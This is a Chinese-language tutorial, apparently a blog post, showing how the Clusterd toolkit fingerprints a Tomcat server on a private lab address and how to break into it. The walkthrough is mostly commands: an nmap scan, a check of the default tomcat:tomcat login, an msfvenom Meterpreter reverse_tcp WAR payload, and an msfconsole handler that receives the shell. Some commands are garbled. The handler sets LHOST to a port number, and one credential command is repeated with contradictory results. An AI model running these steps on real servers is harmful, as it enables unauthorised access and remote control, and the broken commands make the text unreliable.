关于Clusterd
Clusterd是一款专门用于攻击应用服务器开源工具包,可以自动化的识别服务器指纹、探测并且自动对服务器进行攻击。简而言之clusterd就是一个中间件渗透软件,它能识别的中间件件有JBoss、ColdFusion、WebLogic、Tomcat、Railo、Axis2、Glassfish。
使用参数
中间参数
使用范例(tomcat为例)
使用nmap扫描目标常用端口
nmap -sS -sV -o 192.168.0.5
nmap扫描出目标tcp8180端口是tomcat服务,目标服务是linux;利用clusterd确定tomcat详细信息
clusterd -i 192.168.0.5 -p 8180 -a tomcat -o linux --tc-info
确定tomcat版本是5.5版本
查看tomcat部署项目
clusterd -i 192.168.0.5 -p 8180 -a tomcat -o linux -v 5.5 --tc-list
成功得到部署的项目列表
尝试clusterd生成msf监听war包
clusterd --gen-payload 192.168.0.103:8888 -o linux -a tomcat -v 5.5
生成war包出错,因为msf在新版本中不在使用msfpayload生成war包;既然不能生成,肯定不能对应的部署war了。如何解决?
通过前面的tomcat项目列表可知道clusterd对tomcat管理控制台进行了爆破,那说明账号密码就在代码中
。通过参数参照tomcat管理控制台密码
clusterd -i 192.168.0.5 -p 8180 -a tomcat -v 5.5 --usr-auth tomcat:tomcat
出错,尝试tomcat:tomcat
clusterd -i 192.168.0.5 -p 8180 -a tomcat -v 5.5 --usr-auth tomcat:tomcat
未出错。确定确定为tomcat:tomcat。利用msf生成war包
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 -f war > shell.war
msf进行监听
msfconsole -x "use exploit/multi/handler; set LHOST 192.168.0.103; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST 4444; run"
手动部署war包到管理控制台,msf端成功监听
接下来就可以利用msf进行后期渗透了。
领取专属 10元无门槛券
私享最新 技术干货